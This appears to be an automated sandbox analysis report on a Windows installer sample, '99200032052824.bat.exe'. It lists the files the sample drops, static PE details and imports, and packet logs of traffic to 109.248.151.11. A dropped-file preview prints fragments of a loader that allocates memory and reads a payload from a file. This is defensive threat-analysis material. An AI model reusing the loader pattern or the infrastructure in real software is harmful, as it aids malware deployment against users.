Preview:	.....H.74....j......J.........7....l..........N.4..........t.............s.kO...H.z..J.)b.....L......v.;.$......F..C.5.p:J...................q.....{....X.....-......;....`......{z...)...`..."...........8.....$..P...?.....................j.L..@......@........x..........F.............=......,..........s......r.j........W.x1......4............X...m..S..V..\|.c.."...h.........q'......e.2....:..........j.....AB......A...\"..F........ .....>..v....T....o..%b.X.X....6..g)...'..F...o........ $X......9.0G... ..{..t...#p!P2....S....._..,n.X..........o.....s..3....H..\|....#.9..5...~...U......@p.........gL..o..<........XD.$.....D.f..U.....`...........M....%..%O..q...._.....K...}.............8...I....".t.............R..L.......9.......?....z.../.....k].Ne..o.6.....y..%.....R......j.....Dp.........#.d.1...V.......J..........W..3..5.I..........2.......u..................ME.......!......O.........).F...f..{..k....z.<,........P...e1.......i.....=*._.......,........'.d.........<...W......".

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\afkontrollere.urb

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	14713
Entropy (8bit):	4.934954013154932
Encrypted:	false
SSDEEP:	192:P15IKag1z48yfTvHm1GpudD2DrxwmUnagvnp4xzaM8QIbpU3NbiLghghkLm:NJX88yKQpuUa31fpfM8QHGgWv
MD5:	4F98614616B284CB3F6BE2259A3BAA26
SHA1:	C750B5F26D0663189B089D2FE799F085E533B90C
SHA-256:	9E0410CA591D013A22A483F132A6B42E66D799953F4B4450AA42B02015B93CFA
SHA-512:	C5FB64F244D4A41D35AA00F5991004F03C621264885ED9E4748799F7B7E15A8C1DDD2BFD32A75CAB8C350ACE2AD7C3CEB2BAEF375E2B660E8927F9D863CA2E7B
Malicious:	false
Preview:	......<.........../s......l..!..........X...A........)...i.......E...>....P........B................U.............................&..........A...E........'.......T....=.......E.........<}.F...................V........\....D.....R..........w..]^.o.G....>..........$...fp..@.......9.........k..$..........`..............+./.p.z6.........................M.)................................=......K.?.VGk...._.......>.......~..c....0..4.....9..........U....#.......".T......q..St.......Y....eZ................................<j........#...;.N.....d.......J....k:.'....{.........y........!u........!.............0r....1..8....u..R..iV....O......;.........I...1....d....G..".d.~?..................7...'.a....~..Dk.F.%........L.....j........9W...........=...l..-.<=...Z....!2.{..S..z.......?..m..................x..$.{....9...L............N.........8.G!.P..Y.........Y.......e.......KY..m.............].z......A.......n.o.........L.....&E.....U.........f.....+....e....h..\|K.8.....Xd..........zL..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\parallelopipedon.idi

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	16272
Entropy (8bit):	4.562088205470639
Encrypted:	false
SSDEEP:	384:CUZhzCym6kuUq5PHVtiNLm4l5j+iWb4WCs9JDbGo4mt:9h+ymGn5PjiNplVDWLCwJZ42
MD5:	BCD7E822363D8366F1EF6E6611BC2F3D
SHA1:	9A0245A3BBC5635641745368A3AD683ECF00BBA3
SHA-256:	062B935DB8D2D43C3A7B8C813E36F904C4FAFF8005D36F5005E7CA8040372D22
SHA-512:	BB842534FBA2E80705BD7465CD00B7E43B2DAD8146A69D9A3D06F7558606CAA4197009837413D1794B0BA0CC08CE9E290DD43D8B9944DF0DBA535625EAA68227
Malicious:	false
Preview:	................88888888.................e.....................S.}.D................UUU........k...e...r...n...e...l...3...2...:...:...C...r...e...a...t...e.kkF...i...l...e...A...(...m... ...r...4... ...,... ...i... ..70..ex...8...0...0...0...0...0...0..X0.rr,... ...i... ...0.KK,... ...p... ...0...,... ...i... ...4...,... ..Ei... ...0...x..28...0...,... ...i... ...0...)...i.....V.r...8...q...k..*e...r...n..4e...l...3...2...:...:...S.}}e...t...F...i...l...e...P...o...i...n...t.ooe...r...(...i... .LLr...8...,... ...i... ..G2..h3...0...1...2..2 ...,... ...i... ..E0...,...i... ...0...)...i.......r.FF4...q...k..2e...r...n...e...l...3...2...:.KK:...V...i..{r...t..yu...a.2.l..#A...l...l..@o.//c...(...i... ...0. .,...i... ...8...9..[7...8...4...3.'.2...0...,... ...i... ...0...x...3.b.0...0.++0...,... .$$i... ...0...x...4...0...)...p.....hhr...2...q...k..ye...r...n...e...l...3...2...:...:...R...e...a...d...F...i..%l...e...(...i... ...r...8...,... ...i... .r.r...2...,... ...i... ...8...9...7...8

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.232824297475422
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	99200032052824.bat.exe
File size:	543'903 bytes
MD5:	085de7ac75bbd791c1b1f979fe8ff78c
SHA1:	f33f25a99dbf0f7b9c2ad2bc886e7748cb5d888f
SHA256:	f76bdeb70f9927c49aa87d92d92eb93d05317a3bde63da7a78a11033b29b41ab
SHA512:	afb829b774d73e4195702ff0e604626e485c2fc1b1bba93218e487947c75b2fe895ce1078f314746b256e591bbba545736be4722e569546d84a0edef7c259d4f
SSDEEP:	6144:i7eSVq22TITpPumUWUdtmYQ+V3Wm8WABXQsHSx4J5t9oDTsaPhygOdtUwj0Tnmu9:karCpPHibxB3mlaPhygoRu6Xo
TLSH:	97C4BD3827F0A386D176A67107E1E1355BF01F24EDD8C707D9B0661AAB62DDA3C8924F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...)..\.................d...\|.....

File Icon


Icon Hash:	347aa6868692d22e

Static PE Info

General

Entrypoint:	0x40320c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F29 [Sat Dec 15 22:24:41 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3abe302b6d9a1256e6a915429af4ffd2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A0h]
call dword ptr [0040809Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F40Ch], eax
je 00007F809508D333h
push ebx
call 00007F809509040Ah
cmp eax, ebx
je 00007F809508D329h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007F8095090386h
push esi
call dword ptr [00408098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F809508D30Dh
push 0000000Ah
call 00007F80950903DEh
push 00000008h
call 00007F80950903D7h
push 00000006h
mov dword ptr [0042F404h], eax
call 00007F80950903CBh
cmp eax, ebx
je 00007F809508D331h
push 0000001Eh
call eax
test eax, eax
je 00007F809508D329h
or byte ptr [0042F40Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429830h
call dword ptr [00408178h]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x853c	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x41000	0x2c198	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x628f	0x6400	6cd58568c5809fdd0c7dcb006e4acdba	False	0.6700390625	data	6.442207080714446	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x135c	0x1400	b27ba0846d4bbf5bff764f5a5c418a97	False	0.4611328125	data	5.240043476337556	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25518	0x600	12c02de2bdc517e2722ceeb84aff8b34	False	0.455078125	data	4.04938010159809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x30000	0x11000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x41000	0x2c198	0x2c200	96489cbbab3b3da7b86af0f759d0ecdd	False	0.21858954497167138	data	4.658248901906368	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x41388	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.09613450845853543
RT_ICON	0x51bb0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.1351955013664074
RT_ICON	0x5b058	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.16353974121996304
RT_ICON	0x604e0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.1528696268304204
RT_ICON	0x64708	0x3ba1	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9931215198165738
RT_ICON	0x682b0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.21597510373443984
RT_ICON	0x6a858	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.2575046904315197
RT_ICON	0x6b900	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.3622950819672131
RT_ICON	0x6c288	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.4787234042553192
RT_DIALOG	0x6c6f0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6c7f0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6c910	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x6c9d8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6ca38	0x84	data	English	United States	0.7348484848484849
RT_VERSION	0x6cac0	0x398	OpenPGP Public Key	English	United States	0.4880434782608696
RT_MANIFEST	0x6ce58	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 09:15:10.686388969 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:10.897634983 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:10.897831917 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:10.898099899 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.112833977 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.112972021 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.112987041 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.113018990 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.113080025 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.113132954 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.113132954 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.113289118 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.324342012 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.324438095 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.324537039 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.324553013 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.324620008 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.324654102 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.324686050 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.324738026 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.324785948 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.324786901 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.324800968 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.324903965 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.324934006 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.324934006 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.325114012 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.537586927 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.537686110 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.537700891 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.537781000 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.537892103 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.537909031 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.537942886 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.538033962 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.538084984 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.538147926 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.538162947 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.538188934 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.538274050 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.538367033 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.538423061 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.538423061 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.538536072 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.538548946 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.538564920 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.538610935 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.538662910 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.538722992 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.538722992 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.538733006 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.538789988 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.538825035 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.538942099 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.748940945 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749038935 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749054909 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749135971 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749142885 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.749217987 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.749249935 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749313116 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.749377012 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749389887 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749401093 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749403954 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.749470949 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749558926 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.749592066 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749644041 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749690056 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.749721050 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749767065 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749779940 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.749871969 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.749871969 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.749878883 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749891043 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.749902010 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750001907 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750005960 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750052929 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750111103 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750122070 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750133991 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750169992 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750216007 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750236034 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750236034 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750346899 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750359058 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750391006 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750396013 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750503063 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750508070 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750610113 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750622034 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750633001 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750704050 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750715971 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750751972 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750751972 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750849009 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750879049 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750891924 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.750897884 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.750902891 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.751015902 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.751064062 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.959512949 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.959613085 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.959758043 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.959867001 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.960447073 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.960566044 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.960573912 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.960604906 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.960691929 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.960731983 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.960732937 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.960772038 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.960804939 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.960854053 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.960927010 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.960942984 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961004972 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961019039 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961050987 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961124897 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961173058 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961173058 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961175919 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961227894 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961240053 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961321115 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961368084 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961416960 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961422920 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961476088 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961488962 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961550951 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961595058 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961595058 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961611032 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961692095 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961724043 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961736917 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961741924 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961790085 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961831093 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961842060 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961852074 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961889029 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961949110 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961961985 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.961971045 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961971045 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.961973906 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962094069 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962172985 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962191105 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.962227106 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962244034 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.962333918 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962347031 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962385893 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.962426901 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962490082 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.962541103 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.962589979 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.962610006 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962625027 CEST	80	50031	109.248.151.11	192.168.11.30
